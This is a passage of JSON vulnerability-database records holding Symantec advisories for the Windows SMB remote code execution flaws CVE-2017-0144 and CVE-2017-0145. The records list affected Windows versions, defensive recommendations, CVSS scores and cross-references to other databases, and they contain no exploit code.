x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-12T06:25:08", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2018-03-12T06:25:08", "rev": 2, "value": 8.5, "vector": "NONE"}}, "hash": "144a9d84179cedcbcb0c983b778067361365e1dc871eae6528d5353d918e6462", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "abcb22f27c94091dc024c94de8b306a3", "key": "href"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "71cae0a4314c6ca0b4b915f8febd133b", "key": "title"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96705", "id": "SMNTC-96705", "immutableFields": [], "lastseen": "2018-03-12T06:25:08", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0145 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 590}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-12T06:25:08"}], "viewCount": 702, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "abcb22f27c94091dc024c94de8b306a3"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "71cae0a4314c6ca0b4b915f8febd133b"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96704", "hash": "cdb3d06d69978ad720cbb0c1457bfd23d95fe80395902fcd73d43b26c759c042", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0144 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96704", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0144"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-13T12:07:45", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["CVE-2017-0144"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2018-03-13T12:07:45", "rev": 2, "value": 9.1, "vector": "NONE"}}, "hash": "11dbe39c4d7f15175d2e87f6ef9d882eecc8739a45bf17a81ca27afb5db2d3db", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "91624b45ebf883841bfe8f7b6a15aa38", "key": "href"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "766e2dcc28b9a137fc31c493662a08bd", "key": "title"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96704", "id": "SMNTC-96704", "immutableFields": [], "lastseen": "2018-03-13T12:07:45", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0144 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 559}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-13T12:07:45"}, {"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0144"], "cvss": {"score": 0.0, 